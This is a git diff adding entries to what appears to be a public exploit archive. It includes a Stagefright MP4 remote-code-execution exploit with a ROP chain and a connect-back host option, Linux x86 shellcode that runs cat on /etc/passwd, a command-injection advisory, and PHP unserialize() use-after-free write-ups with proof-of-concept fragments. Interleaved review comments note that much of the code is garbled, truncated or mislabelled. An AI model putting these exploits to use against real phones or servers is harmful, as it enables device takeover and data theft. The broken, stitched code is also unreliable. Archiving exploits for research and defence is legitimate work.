diff --git a/files.csv b/files.csv
index 3b46cc8d3..f16e1f5ff 100755
--- a/files.csv
+++ b/files.csv
@@ -34403,6 +34403,7 @@ id,file,description,date,author,platform,type,port
 38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include Vulnerability",2012-12-30,Amirh03in,php,webapps,0
 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection Vulnerability",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection Vulnerability",2012-12-04,AkaStep,php,webapps,0
+38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit (Shell Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
@@ -34410,3 +34411,17 @@ id,file,description,date,author,platform,type,port
 38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
 38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0
+38111,platforms/php/webapps/38111.txt,"Wordpress Simple Gmail Login Plugin Stack Trace Information Disclosure Vulnerability",2012-12-07,"Aditya Balapure",php,webapps,0
+38112,platforms/php/webapps/38112.txt,"FOOT Gestion 'id' Parameter SQL Injection Vulnerability",2012-12-07,"Emmanuel Farcy",php,webapps,0
+38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module SQL Injection Vulnerability",2012-12-08,"Cold Zero",php,webapps,0
+38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0
+38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0
+38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
+38118,platforms/xml/webapps/38118.txt,"Qlikview <= 11.20 SR11 - Blind XXE Injection Vulnerability",2015-09-09,"Alex Haynes",xml,webapps,0
+38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - CSRF Vulnerability",2015-09-09,"Aryan Bayaninejad",php,webapps,0
+38120,platforms/php/dos/38120.txt,"PHP SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38122,platforms/php/dos/38122.txt,"PHP SplObjectStorage 
unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
+38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
+38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
diff --git a/platforms/android/remote/38124.py b/platforms/android/remote/38124.py
new file mode 100755
index 000000000..8318d614c
--- /dev/null
+++ b/platforms/android/remote/38124.py
@@ -0,0 +1,377 @@ +#!/usr/bin/env python +# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs +# Shout outs to our friends at Optiv (formerly Accuvant Labs) +# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 +# www.zimperium.com +# +# Exploit for RCE Vulnerability CVE-2015-1538 #1 +# Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling +# +# Don’t forget, the output of “create_mp4” can be delivered many ways! +# MMS is the most dangerous attack vector, but not the only one… +# +# DISCLAIMER: This exploit is for testing and educational purposes only. Any +# other usage for this code is not allowed. Use at your own risk. +# +# “With great power comes great responsibility.” – Uncle Ben +# +import struct +import socket +# +# Creates a single MP4 atom – LEN, TAG, DATA +# +def make_chunk(tag, data): + if len(tag) != 4: + raise ‘Yo! They call it “FourCC” for a reason.’ + ret = struct.pack(‘>L’, len(data) + 8) + ret += tag + ret += data + return ret +# +# Make an ‘stco’ atom – Sample Table Chunk Offets +# +def make_stco(extra=”): + ret = struct.pack(‘>L’, 0) # version + ret += struct.pack(‘>L’, 0) # mNumChunkOffsets + return make_chunk(‘stco’, ret+extra) +# +# Make an ‘stsz’ atom – Sample Table Size +# +def make_stsz(extra=”): + ret = struct.pack(‘>L’, 0) # version + ret += struct.pack(‘>L’, 0) # mDefaultSampleSize + ret += struct.pack(‘>L’, 0) # mNumSampleSizes + return make_chunk(‘stsz’, ret+extra) +# +# Make an ‘stts’ atom – Sample Table Time-to-Sample +# +def make_stts(): + ret = struct.pack(‘>L’, 0) # version + ret += struct.pack(‘>L’, 0) # mTimeToSampleCount + return make_chunk(‘stts’, ret) +# +# This creates a single Sample Table Sample-to-Chunk entry +# +def make_stsc_entry(start, per, desc): + ret = ” + ret += struct.pack(‘>L’, start + 1) + ret += struct.pack(‘>L’, per) + ret += struct.pack(‘>L’, desc) + return ret +# +# Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk +# +# If the caller desires, we will attempt to trigger 
(CVE-2015-1538 #1) and +# cause a heap overflow. +# +def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): + ret = struct.pack(‘>L’, 0) # version/flags + # this is the clean version… + if not do_overflow: + ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets + ret += ‘Z’ * (12 * num_alloc) + return make_chunk(‘stsc’, ret) + + # now the explicit version. (trigger the bug) + ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets + # fill in the entries that will overflow the buffer + for x in range(0, num_write): + ret += make_stsc_entry(sp_addr, sp_addr, sp_addr) + + ret = make_chunk(‘stsc’, ret) + + # patch the data_size + ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:] + + return ret + +# +# Build the ROP chain +# +# ROP pivot by Georg Wicherski! Thanks! +# +“”” +(gdb) x/10i __dl_restore_core_regs + 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 + 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} + 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5} + 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} + 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc} +“”” +“”” +b0001144 <__dl_mprotect>: +b0001144: e92d0090 push {r4, r7} +b0001148: e3a0707d mov r7, #125 ; 0x7d +b000114c: ef000000 svc 0x00000000 +b0001150: e8bd0090 pop {r4, r7} +b0001154: e1b00000 movs r0, r0 +b0001158: 512fff1e bxpl lr +b000115c: ea0015cc b b0006894 <__dl_raise+0x10> +“”” +def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): + rop = ” + rop += struct.pack(‘L’, 0) + ftyp += ‘mp42’ + ftyp += ‘isom’ + chunks.append(make_chunk(‘ftyp’, ftyp)) + + # Note, this causes a few allocations… + moov_data = ” + moov_data += make_chunk(‘mvhd’, + struct.pack(‘>LL’, 0, 0x41414141) + + (‘B’ * 0x5c) ) + + # Add a minimal, verified trak to satisfy mLastTrack being set + moov_data += make_chunk(‘trak’, + make_chunk(‘stbl’, + make_stsc(0x28, 0x28) + + 
make_stco() + + make_stsz() + + make_stts() )) + + # Spray the heap using a large tx3g chunk (can contain binary data!) + “”” + 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs + 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0 + 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1 + 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4 + 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement + 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1 + 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42> + 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase + 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr + 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address + 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6 + 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it! 
+ “”” + page = ” + off = 0 # the offset to the next object + off += 8 + page += struct.pack(‘L’, 0) + + make_chunk(‘ilst’, + make_chunk(‘cpil’, make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) + + make_chunk(‘trkn’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) + + make_chunk(‘disk’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) + + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + + make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + + make_chunk(‘aART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + + make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + + make_chunk(‘gnre’, make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) + + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger))) + ) + ) + moov_data += udta + + # Make the nasty trak + tkhd1 = ”.join([ + ‘\x00’, # version + ‘D’ * 3, # padding + ‘E’ * (5*4), # {c,m}time, id, ??, duration + ‘F’ * 0x10, # ?? 
+ struct.pack(‘>LLLLLL’, + 0x10000, # a00 + 0, # a01 + 0, # dx + 0, # a10 + 0x10000, # a11 + 0), # dy + ‘G’ * 0x14 + ]) + + trak1 = ” + trak1 += make_chunk(‘tkhd’, tkhd1) + + mdhd1 = ”.join([ + ‘\x00’, # version + ‘D’ * 0x17, # padding + ]) + + mdia1 = ” + mdia1 += make_chunk(‘mdhd’, mdhd1) + mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a) + + dinf1 = ” + dinf1 += make_chunk(‘dref’, ‘H’ * 0x14) + + minf1 = ” + minf1 += make_chunk(‘smhd’, ‘G’ * 0x08) + minf1 += make_chunk(‘dinf’, dinf1) + + # Build the nasty sample table to trigger the vulnerability here. + stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER + + # Add the stbl to the minf chunk + minf1 += make_chunk(‘stbl’, stbl1) + + # Add the minf to the mdia chunk + mdia1 += make_chunk(‘minf’, minf1) + + # Add the mdia to the track + trak1 += make_chunk(‘mdia’, mdia1) + + # Add the nasty track to the moov data + moov_data += make_chunk(‘trak’, trak1) + + # Finalize the moov chunk + moov = make_chunk(‘moov’, moov_data) + chunks.append(moov) + + # Combine outer chunks together and voila. 
+ data = ”.join(chunks) + + return data + +if __name__ == ‘__main__’: + import sys + import mp4 + import argparse + + def write_file(path, content): + with open(path, ‘wb’) as f: + f.write(content) + + def addr(sval): + if sval.startswith(‘0x’): + return int(sval, 16) + return int(sval) + + # The address of a fake StrongPointer object (sprayed) + sp_addr = 0x41d00010 # takju @ imm76i – 2MB (via hangouts) + + # The address to of our ROP pivot + newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs + + # Allow the user to override parameters + parser = argparse.ArgumentParser() + parser.add_argument(‘-c’, ‘–connectback-host’, dest=‘cbhost’, default=‘31.3.3.7’) + parser.add_argument(‘-p’, ‘–connectback-port’, dest=‘cbport’, type=int, default=12345) + parser.add_argument(‘-s’, ‘–spray-address’, dest=‘spray_addr’, type=addr, default=None) + parser.add_argument(‘-r’, ‘–rop-pivot’, dest=‘rop_pivot’, type=addr, default=None) + parser.add_argument(‘-o’, ‘–output-file’, dest=‘output_file’, default=‘cve-2015-1538-1.mp4’) + args = parser.parse_args() + + if len(sys.argv) == 1: + parser.print_help() + sys.exit(–1) + + if args.spray_addr == None: + args.spray_addr = sp_addr + if args.rop_pivot == None: + args.rop_pivot = newpc_val + + # Build the MP4 file… + data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport) + print(‘[*] Saving crafted MP4 to %s …’ % args.output_file) + write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf \ No newline at end of file diff --git a/platforms/cgi/webapps/38114.html b/platforms/cgi/webapps/38114.html new file mode 100755 index 000000000..601e0dfda --- /dev/null +++ b/platforms/cgi/webapps/38114.html 
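Review bot: The committed 38124.py is not valid Python as stored: its string literals use typographic quotes throughout (`struct.pack(‘>L’, ...)`, the empty string written as `”` in `def make_stco(extra=”):`), `sys.exit(–1)` carries an en-dash, and the `- See more at: https://blog.zimperium.com/…` text appended to the last line shows it was pasted from the blog's HTML rendering rather than taken from the author's source; the sibling files in this diff keep plain ASCII quotes, so this is in the blob, not in the page rendering. Beyond encoding, `make_chunk` does `raise ‘Yo! They call it “FourCC” for a reason.’`, raising a plain string, which Python 2.7 rejects with a TypeError instead of the intended message, and the `__main__` block does `import mp4` and calls `mp4.create_mp4(...)` even though `create_mp4` is defined in this same file, so the script cannot run under its archived name. Several statements also read as truncated (`rop += struct.pack(‘L’, 0) + ftyp += ‘mp42’` joins the start of `build_rop` to the middle of `create_mp4`), which looks like text between angle brackets dropped by an HTML conversion and may be only this rendering; the blob should be checked. The entry should be replaced by a byte-exact copy of the original source, and until then the index description should mark it as non-functional.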
@@ -0,0 +1,62 @@ +source: http://www.securityfocus.com/bid/56881/info + +Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities. + +Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer. + +Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. + +1. + +
+ + + +
+ + +2. + +
+ + +
+ + +3. + +
+ + +
+ + +4. + +
+ + +
+ 
diff --git a/platforms/lin_x86/shellcode/38094.c b/platforms/lin_x86/shellcode/38094.c
new file mode 100755
index 000000000..009c08a50
--- /dev/null
+++ b/platforms/lin_x86/shellcode/38094.c
@@ -0,0 +1,72 @@
+#!/bin/python
+from sys import argv
+
+"""
+Shellcode Generator...
+Create file with permission 7775
+
+---------------------------------------------------------------------------------
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060: eb 12 jmp 0x8048074
+ 8048062: 5b pop %ebx
+ 8048063: 31 c0 xor %eax,%eax
+ 8048065: 88 43 05 mov %al,0x5(%ebx)
+ 8048068: b0 08 mov $0x8,%al
+ 804806a: b1 ff mov $0xff,%cl
+ 804806c: b5 ff mov $0xff,%ch
+ 804806e: cd 80 int $0x80
+ 8048070: b0 01 mov $0x1,%al
+ 8048072: cd 80 int $0x80
+ 8048074: e8 e9 ff ff ff call 0x8048062
+ 8048079: 61 popa
+ 804807a: 6a 69 push $0x69
+ 804807c: 74 68 je 0x80480e6
+ 804807e: 23 .byte 0x23
+ ---------------------------------------------------------------------------------
+ b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
+
+ Om Asato Maa Sad-Gamaya |
+ Tamaso Maa Jyotir-Gamaya |
+ Mrtyor-Maa Amrtam Gamaya |
+ Om Shaantih Shaantih Shaantih |
+"""
+
+bann3r = '''
+/*
+ [][][][][][][][][][][][][][][][][][][][][][][]
+ [] []
+ [] c0d3d by Ajith Kp [ajithkp560] []
+ [] http://www.terminalcoders.blogspot.in []
+ [] []
+ [][][][][][][][][][][][][][][][][][][][][][][]
+*/
+'''
+sh3ll = "\\xeb\\x12\\x5b\\x31\\xc0\\x88\\x43"
+sh311 ="\\xb0\\x08\\xb1\\xff\\xb5\\xff\\xcd\\x80\\xb0\\x01\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff"
+print bann3r
+if len(argv)<1:
+ print 'Usage: '+argv[0]+' name_of_file'
+else:
+ fil3 = argv[1]
+ h3x = ''
+ for i in range(len(fil3)):
+ h3x+=str('\\'+hex(ord(fil3[i]))[1:])
+ h3x+=str('\\' + 'x23')
+ l3n = '\\x'+hex((len(fil3)))[2:].zfill(2)
+ sh = str(sh3ll) + str(l3n) + str(sh311) + str(h3x)
+ print '// Compile with'
+ print '// $ gcc -o output source.c'
+ print '// $ execstack -s output'
+ print '// $ ./output'
+ print '////////////////////////////////////////////\n'
+ print '# include '
+ print 'char sh[] = "'+sh+'";'
+ print 'main(int argc, char **argv)'
+ print '''{
+ int (*func)();
+ func = (int (*)()) sh;
+ 
(int)(*func)();'''
+ print '}'
+ print '\n////////////////////////////////////////////'
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/38116.c b/platforms/lin_x86/shellcode/38116.c
new file mode 100755
index 000000000..276469dce
--- /dev/null
+++ b/platforms/lin_x86/shellcode/38116.c
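Review bot: The usage guard `if len(argv)<1:` in 38094.c can never be true, since `argv[0]` is always present, so running the generator without an argument skips the usage message and fails at `fil3 = argv[1]` with an IndexError; it should read `if len(argv) < 2:`. The blob is a Python 2 script (`#!/bin/python`, `print bann3r`) that emits C source, yet it is archived as `platforms/lin_x86/shellcode/38094.c` and indexed in files.csv under that path, so the extension and the index misdescribe the content — a `.py` path, or a description that says it is a generator, would be accurate. `print '# include '` has no header name, which matches the bare `#include` in 38116.c in the same diff and points to angle-bracketed text being dropped by this rendering rather than by the commit, but that is worth confirming against the blob.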
@@ -0,0 +1,76 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+# Linux/x86 - execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL) - 75 bytes
+# Tested in Zorin OS 10 x86
+# Author: Ajith Kp
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060: eb 1f jmp 0x8048081
+ 8048062: 5b pop %ebx
+ 8048063: 31 c0 xor %eax,%eax
+ 8048065: 88 43 0b mov %al,0xb(%ebx)
+ 8048068: 88 43 18 mov %al,0x18(%ebx)
+ 804806b: 89 5b 19 mov %ebx,0x19(%ebx)
+ 804806e: 8d 4b 0c lea 0xc(%ebx),%ecx
+ 8048071: 89 4b 1d mov %ecx,0x1d(%ebx)
+ 8048074: 89 43 21 mov %eax,0x21(%ebx)
+ 8048077: b0 0b mov $0xb,%al
+ 8048079: 8d 4b 19 lea 0x19(%ebx),%ecx
+ 804807c: 8d 53 21 lea 0x21(%ebx),%edx
+ 804807f: cd 80 int $0x80
+ 8048081: e8 dc ff ff ff call 0x8048062
+ 8048086: 2f das
+ 8048087: 2f das
+ 8048088: 2f das
+ 8048089: 2f das
+ 804808a: 62 69 6e bound %ebp,0x6e(%ecx)
+ 804808d: 2f das
+ 804808e: 63 61 74 arpl %sp,0x74(%ecx)
+ 8048091: 23 2f and (%edi),%ebp
+ 8048093: 2f das
+ 8048094: 65 74 63 gs je 0x80480fa
+ 8048097: 2f das
+ 8048098: 70 61 jo 0x80480fb
+ 804809a: 73 73 jae 0x804810f
+ 804809c: 77 64 ja 0x8048102
+ 804809e: 23 41 4a and 0x4a(%ecx),%eax
+ 80480a1: 49 dec %ecx
+ 80480a2: 54 push %esp
+ 80480a3: 48 dec %eax
+ 80480a4: 41 inc %ecx
+ 80480a5: 4a dec %edx
+ 80480a6: 49 dec %ecx
+ 80480a7: 54 push %esp
+ 80480a8: 48 dec %eax
+ 80480a9: 4b dec %ebx
+ 80480aa: 50 push %eax
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o cat_etc_passwd cat_etc_passwd.c
+$ execstack -s cat_etc_passwd
+$ ./cat_etc_passwd
+ 
+---------------------------------------------------------------------------------------------------
+*/
+#include 
+char sh[]="\xeb\x1f\x5b\x31\xc0\x88\x43\x0b\x88\x43\x18\x89\x5b\x19\x8d\x4b\x0c\x89\x4b\x1d\x89\x43\x21\xb0\x0b\x8d\x4b\x19\x8d\x53\x21\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x63\x61\x74\x23\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x4a\x49\x54\x48\x41\x4a\x49\x54\x48\x4b\x50";
+// It will create file named 'ajith' with permission 7775
+void main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int (*)()) sh;
+ (int)(*func)();
+}
diff --git a/platforms/php/dos/38120.txt b/platforms/php/dos/38120.txt
new file mode 100755
index 000000000..d242d90dd
--- /dev/null
+++ b/platforms/php/dos/38120.txt
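Review bot: The comment `// It will create file named 'ajith' with permission 7775` above `main` in 38116.c describes the neighbouring entry 38094 (the create-file generator), not this payload, whose header and disassembly show `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`; it should be replaced with something like `// Jumps into the execve("/bin/cat") payload stored in sh[]`. `void main(int argc, char **argv)` is non-conforming C and neither parameter is used, so `int main(void)` with a `return 0;` would compile cleanly under `-Wall`, and the `(int)` cast in `(int)(*func)();` is discarded and can go. `#include` has no header name here, and `print '# include '` in 38094.c is equally bare, which points to angle-bracketed text being dropped by this rendering rather than by the commit, but the blob should be checked before the entry is considered compilable as archived.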
@@ -0,0 +1,103 @@ +Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList + +Taoguang Chen <[@chtg](http://github.com/chtg)> - +Write Date: 2015.8.27 +Release Date: 2015.9.4 + +A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. + +Affected Versions +------------ +Affected is PHP 5.6 < 5.6.13 +Affected is PHP 5.5 < 5.5.29 +Affected is PHP 5.4 < 5.4.45 + +Credits +------------ +This vulnerability was disclosed by Taoguang Chen. + +Description +------------ + + + while(*p == ':') { + ++p; + ALLOC_INIT_ZVAL(elem); + if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) { + zval_ptr_dtor(&elem); + goto error; + } + + spl_ptr_llist_push(intern->llist, elem TSRMLS_CC); + } + + +It has been demonstrated many times before that __wakeup() leads to +ZVAL is freed from memory. However during deserialization will still +allow to use R: or r: to set references to that already freed memory. +It is possible to use-after-free attack and execute arbitrary code +remotely. + +Proof of Concept Exploit +------------ +The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12. 
+ + +ryat = 1; + } +} + +$fakezval = ptr2str(1122334455); +$fakezval .= ptr2str(0); +$fakezval .= "\x00\x00\x00\x00"; +$fakezval .= "\x01"; +$fakezval .= "\x00"; +$fakezval .= "\x00\x00"; + +$inner = 'i:1234;:i:1;'; +$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}'; + +$data = unserialize($exploit); + +var_dump($data); + +function ptr2str($ptr) +{ + $out = ''; + for ($i = 0; $i < 8; $i++) { + $out .= chr($ptr & 0xff); + $ptr >>= 8; + } + return $out; +} + +?> + + +Test the PoC on the command line: + + +$ php uafpoc.php +array(5) { + [0]=> + int(1) + [1]=> + &int(1) + [2]=> + object(obj)#2 (1) { + ["ryat"]=> + &int(1) + } + [3]=> + array(1) { + [0]=> + int(1122334455) <=== so we can control the memory and create fake ZVAL :) + } + [4]=> + string(24) "?v?B????" +} diff --git a/platforms/php/dos/38121.txt b/platforms/php/dos/38121.txt new file mode 100755 index 000000000..51c16d636 --- /dev/null +++ b/platforms/php/dos/38121.txt 
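Review bot: The `Proof of Concept Exploit` section of 38120.txt survives only as fragments — after `The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.` nothing remains but the tail of a class (`ryat = 1;`) and `ptr2str`, and in 38121.txt the PoC collapses to `>= 8;`, the remainder of `$ptr >>= 8;` — which is consistent with an HTML conversion dropping everything from `<?php` to the next `>`, and with `&current` in the 38123.txt source excerpt appearing as `¤t` (`&curren` decoded as an entity). The same truncation affects 38121.txt, 38122.txt, 38123.txt and 38125.txt. This is most likely the rendering of this page rather than the committed blobs, but since these advisories are the archive's only record of the PoCs and of the quoted PHP source, the blobs should be verified as complete and byte-exact before the entries are indexed as working.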
@@ -0,0 +1,104 @@ +Use After Free Vulnerability in unserialize() with GMP + +Taoguang Chen <[@chtg](http://github.com/chtg)> +Write Date: 2015.8.17 +Release Date: 2015.9.4 + +A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. + +Affected Versions +------------ +Affected is PHP 5.6 < 5.6.13 + +Credits +------------ +This vulnerability was disclosed by Taoguang Chen. + +Description +------------ + +static int gmp_unserialize(zval **object, zend_class_entry *ce, const +unsigned char *buf, zend_uint buf_len, zend_unserialize_data *data +TSRMLS_DC) /* {{{ */ +{ + ... + + INIT_ZVAL(zv); + if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC) + || Z_TYPE_P(zv_ptr) != IS_STRING + || convert_to_gmp(gmpnum, zv_ptr, 10 TSRMLS_CC) == FAILURE + ) { + zend_throw_exception(NULL, "Could not unserialize number", 0 TSRMLS_CC); + goto exit; + } + zval_dtor(&zv); + + INIT_ZVAL(zv); + if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC) + || Z_TYPE_P(zv_ptr) != IS_ARRAY + ) { + zend_throw_exception(NULL, "Could not unserialize properties", 0 TSRMLS_CC); + goto exit; + } + + +The GMP object's deserialization can create ZVAL and free its +zval_value from memory via zval_dtor(). However during deserialization +will still allow to use R: or r: to set references to that already +freed memory. It is possible to use-after-free attack and execute +arbitrary code remotely. + +Proof of Concept Exploit +------------ +The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12. + +>= 8; + } + return $out; +} + +?> + + +Test the PoC on the command line: + +$ php uafpoc.php +array(2) { + [0]=> + int(1122334455) <=== so we can control the memory and create fake ZVAL :) + [1]=> + object(GMP)#1 (2) { + [0]=> + array(1) { + [0]=> + int(4325299791) + } + ["num"]=> + string(1) "1" + } +} 
diff --git a/platforms/php/dos/38122.txt b/platforms/php/dos/38122.txt
new file mode 100755
index 000000000..d8a487abc
--- /dev/null
+++ b/platforms/php/dos/38122.txt
@@ -0,0 +1,106 @@ +Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage + +Taoguang Chen <[@chtg](http://github.com/chtg)> +Write Date: 2015.8.27 +Release Date: 2015.9.4 + +A use-after-free vulnerability was discovered in unserialize() with SplObjectStorage object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. + +Affected Versions +------------ +Affected is PHP 5.6 < 5.6.13 +Affected is PHP 5.5 < 5.5.29 +Affected is PHP 5.4 < 5.4.45 + +Credits +------------ +This vulnerability was disclosed by Taoguang Chen. + +Description +------------ + + + ALLOC_INIT_ZVAL(pentry); + if (!php_var_unserialize(&pentry, &p, s + buf_len, &var_hash TSRMLS_CC)) { + zval_ptr_dtor(&pentry); + goto outexcept; + } + if(Z_TYPE_P(pentry) != IS_OBJECT) { + goto outexcept; + } + ALLOC_INIT_ZVAL(pinf); + if (*p == ',') { /* new version has inf */ + ++p; + if (!php_var_unserialize(&pinf, &p, s + buf_len, &var_hash TSRMLS_CC)) { + zval_ptr_dtor(&pinf); + goto outexcept; + } + } + + +It has been demonstrated many times before that __wakeup() leads to +ZVAL is freed from memory. However during deserialization will still +allow to use R: or r: to set references to that already freed memory. +It is possible to use-after-free attack and execute arbitrary code +remotely. + 